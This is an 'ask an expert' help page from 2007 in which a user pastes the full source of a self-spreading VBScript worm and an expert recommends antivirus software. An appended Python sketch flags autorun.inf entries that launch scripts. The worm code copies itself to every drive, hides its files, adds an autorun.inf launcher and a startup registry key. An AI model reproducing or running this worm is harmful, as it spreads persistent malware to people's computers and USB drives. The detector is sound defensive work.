Computer Security & Viruses/vbs virus
Expert: Carolyn Meinel - 2/10/2007
Question
Hello,
I got hit by a virus. It places a vbs file in all hard drives and flash disks. Looking at the vbs file (as far as my untrained eye could see), it puts some entries in the registry and the start-up. I tried deleting the file and removing the registry entries, but the next time I boot up, it is still there. Here is the content of the vbs file:
'THIS IS A MODIFIED VERSION BY:
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunFS6519",winpath&"FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
Thanks in advance,
Nino
Answer
That is the TAGA LIPA ARE virus. Any up-to-date antivirus program should remove it. Instead of trying to do by hand what any decent antivirus program should have done for you, I suggest that you uninstall whatever antivirus you were running and instead install the free trial version of F-Secure Internet Security:
http://www.f-secure.com/home_user/support_and_downloads/evaluations/
In the future, it is a good idea to use a complete Internet security suite because they include protection from all sorts of break-ins through their firewalls and also protection against adware and spyware.
Also, don't use Internet Explorer or Outlook because they make it easy for the bad guys and viruses to break in. Instead you can use the much safer Firefox browser and Thunderbird email client, both free at www.mozilla.org.
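An added example, not part of the original question or answer: the posted script writes an autorun.inf whose shellexecute line starts wscript.exe on its .vbs copy, and sets attribute value 39 on the files it drops. This Python sketch flags that kind of autorun.inf launch entry and decodes the attribute mask; the function names and the benign sample are constructed for illustration.

```python
import re

# Script hosts and script extensions that should not appear in an autorun launch command.
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd")
# Keys in the [autorun] section that make Windows start a program.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
# Windows file attribute bits, used to decode values such as the script's 39.
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}

# The autorun.inf content the posted script builds in its "atr" variable.
SAMPLE = "[autorun]\r\nshellexecute=wscript.exe FS6519.dll.vbs"
# Constructed benign autorun.inf for comparison.
BENIGN = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\n"


def decode_attributes(mask):
    """Names of the attribute bits set in mask (39 hides a file from Explorer)."""
    return [name for bit, name in ATTR_BITS.items() if mask & bit]


def suspicious_autorun_commands(text):
    """Return (key, command, reason) for [autorun] launch entries that run a script."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, command = line.partition("=")
        key, command = key.strip(), command.strip()
        tokens = [t.strip('"').lower() for t in command.split()]
        if not tokens or not LAUNCH_KEY.match(key):
            continue
        exe = tokens[0].rsplit("\\", 1)[-1]  # drop any leading path
        if exe in SCRIPT_HOSTS:
            findings.append((key.lower(), command, "script host"))
        elif any(t.endswith(SCRIPT_EXTS) for t in tokens):
            findings.append((key.lower(), command, "script file"))
    return findings


if __name__ == "__main__":
    print(suspicious_autorun_commands(SAMPLE), decode_attributes(39))
```

Because 39 includes the Hidden and System bits, a scan of drive roots has to include hidden and system files to find the autorun.inf in the first place.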